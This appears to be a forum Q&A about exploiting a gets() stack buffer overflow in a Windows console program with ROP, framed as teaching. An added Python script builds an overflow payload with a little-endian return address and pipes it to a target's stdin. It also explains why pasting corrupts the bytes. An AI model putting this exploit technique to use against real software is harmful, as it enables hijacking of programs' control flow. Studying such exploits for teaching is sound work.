Windows console application with gets() and ROP
I am trying (for teaching purposes) to exploit a gets() call in a function using a return-oriented programming (ROP) method. The target program is a Windows console application that at some point asks for some input and then uses gets() to store the input in an array of up to 80 characters.
I created a file that contains 80 'a' characters at the beginning, plus some extra characters, plus the address 0x5da06c48 to overwrite the old EIP value.
I open the file in a text editor and copy its content to the console as input. I used IDA Pro (or OllyDbg) to set a breakpoint right after gets() returns, and noticed that the address was corrupted: it was set to 0x3fa03f48 (two bytes replaced by 3f).
I also tried other addresses; some of them work well, but in most cases the address is damaged (sometimes characters are missing or replaced, sometimes it is truncated).
How can I solve this problem? Any suggestion would be much appreciated!
First of all, keep track of the endianness of your platform. If you think your bits are in the correct order but you are still receiving incorrect input, it is possible that your shell / text editor is not binary-safe. You are better off writing an exploit for this flaw in a scripting language like Python using the subprocess module, which allows you to write data directly to the stdin pipe of an arbitrary process.
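As an added example (not code from the question or the answer above), the following script shows the two points the answer makes: packing the return address in little-endian byte order with struct, and delivering the raw bytes through a subprocess stdin pipe instead of pasting them into the console. It also simulates why pasting breaks the payload: bytes such as 0xa0 that have no representation in the text path are replaced by '?' (0x3f). The 80-byte buffer and the address 0x5da06c48 come from the question; the 4-byte padding between the buffer and the saved return address, the editor encoding (UTF-8) and console code page (cp437) used in the simulation, and the echo child process used in place of the real target are all assumptions made for this example.

```python
import struct
import subprocess
import sys

TARGET_ADDR = 0x5DA06C48   # address from the question
BUFFER_LEN = 80            # size of the gets() destination array, from the question
PADDING = b"BBBB"          # assumption: bytes between the end of the buffer and the saved EIP


def build_payload(addr=TARGET_ADDR, buffer_len=BUFFER_LEN, padding=PADDING):
    """Filler up to the saved return address, then the address in little-endian (x86) order.

    gets() stops reading at a newline, so a payload containing 0x0a can never arrive whole;
    refuse it here instead of debugging a silently truncated buffer later.
    """
    payload = b"a" * buffer_len + padding + struct.pack("<I", addr)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a, which gets() treats as end of input")
    return payload


def send_to_stdin(payload, argv):
    """Run argv and write the payload bytes straight to its stdin pipe.

    Returns (stdout_bytes, returncode). The trailing newline terminates the gets() call.
    """
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    out, _ = proc.communicate(payload + b"\n")
    return out, proc.returncode


def through_console_text(payload, editor_encoding="utf-8", console_codepage="cp437"):
    """Simulate copying the payload through a text editor and pasting it into the console.

    The editor decodes the file as text (assumed UTF-8); anything that is not valid text becomes
    U+FFFD. The console then encodes the text in its code page (assumed cp437), and characters it
    cannot represent become '?' (0x3f). The bytes that survive are what gets() actually stores.
    """
    text = payload.decode(editor_encoding, errors="replace")
    return text.encode(console_codepage, errors="replace")


def bytes_survive_pipe(payload):
    """True if every byte of the payload comes back unchanged from a child that echoes stdin.

    The echo child stands in for the real target; replace the argv with the target's path.
    """
    echo = [sys.executable, "-c",
            "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"]
    out, rc = send_to_stdin(payload, echo)
    return rc == 0 and out == payload + b"\n"


if __name__ == "__main__":
    p = build_payload()
    print("return address bytes on the wire:", p[-4:].hex())          # 486ca05d
    print("after the text path:            ", through_console_text(p)[-4:].hex())
    print("intact through subprocess pipe: ", bytes_survive_pipe(p))
```

To use it against the real binary, pass something like `[r"C:\path\to\target.exe"]` to `send_to_stdin` and set the breakpoint after gets() as before; the four bytes at the saved EIP should now read 48 6c a0 5d. The simulation uses only one assumed editor/console encoding pair, so it will not reproduce the exact 0x3fa03f48 seen in the question, but it shows the mechanism: any byte the text path cannot represent is rewritten, and a ROP chain with one rewritten byte returns somewhere other than the gadget.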